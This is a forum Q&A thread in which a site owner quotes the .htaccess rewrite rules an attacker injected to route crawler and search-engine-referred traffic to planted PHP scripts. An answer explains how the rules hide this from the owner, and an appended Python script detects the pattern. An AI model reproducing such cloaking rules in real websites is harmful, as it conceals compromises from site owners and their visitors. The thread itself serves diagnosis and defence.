My site was recently attacked with a malware infection. Among the few PHP files that were added, my .htaccess was also modified. Normally it just says index options, but the attacker changed it to say the following:

RewriteEngine on
RewriteRule ^6334437290/(.*)$ dita-cymbal.php [QSA,L]

RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ capacitance-angelika.php?$1 [L]

I know very little about .htaccess. Does anyone know what these rewrite rules do? dita-cymbal.php and capacitance-angelika.php were among the PHP files the attacker added.

Hopefully this will help any future site admins under the same malware attack; when I googled these I got no results.

Albert Renshaw

1 Answer


It says...

Rewrite any request in '6334437290/' to dita-cymbal.php. Don't process any further if this matched.

Rewrite anything that doesn't exist, and either comes from a user agent with a search engine name in it, or has a referrer with a search engine name in it, to capacitance-angelika.php. Presumably so the site owner is unlikely to view these, since they won't visit via search engines, giving more time before detection.
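For admins checking their own sites for the pattern described above, here is an added example (not part of the original question or answer) that audits an .htaccess file for rewrite rules gated on search-engine User-Agent or Referer values, or pointing at PHP files the owner does not recognise. The function name `audit_htaccess` and the `known_scripts` allowlist are assumptions for illustration; the sample input is the file from the question.

```python
import re

# Search-engine names the injected conditions on this page match against.
ENGINES = re.compile(r"google|yahoo|msn|aol|bing", re.I)
CLOAK_VARS = ("HTTP_USER_AGENT", "HTTP_REFERER")

def audit_htaccess(text, known_scripts=("index.php",)):
    """Return [(line_no, script, [reasons])] for suspicious RewriteRules.

    known_scripts is a hypothetical allowlist of PHP files the site owner
    expects rewrite targets to point at.
    """
    findings, conds = [], []
    for line_no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            conds.append((parts[1], parts[2]))  # (test string, pattern)
        elif directive == "rewriterule" and len(parts) >= 3:
            script = parts[2].split("?", 1)[0]  # drop any query string
            reasons = []
            if script.lower().endswith(".php") and script not in known_scripts:
                reasons.append("unexpected PHP target")
            gated = [v for v in CLOAK_VARS
                     if any(v in test and ENGINES.search(pat) for test, pat in conds)]
            if gated and script != "-":
                reasons.append("served only to search-engine traffic via " + "/".join(gated))
            if reasons:
                findings.append((line_no, script, reasons))
            conds = []  # conditions apply only to the next RewriteRule
    return findings

# The modified .htaccess quoted in the question.
SAMPLE = """RewriteEngine on
RewriteRule ^6334437290/(.*)$ dita-cymbal.php [QSA,L]

RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ capacitance-angelika.php?$1 [L]
"""

if __name__ == "__main__":
    for line_no, script, reasons in audit_htaccess(SAMPLE):
        print(f"line {line_no}: {script}: {'; '.join(reasons)}")
```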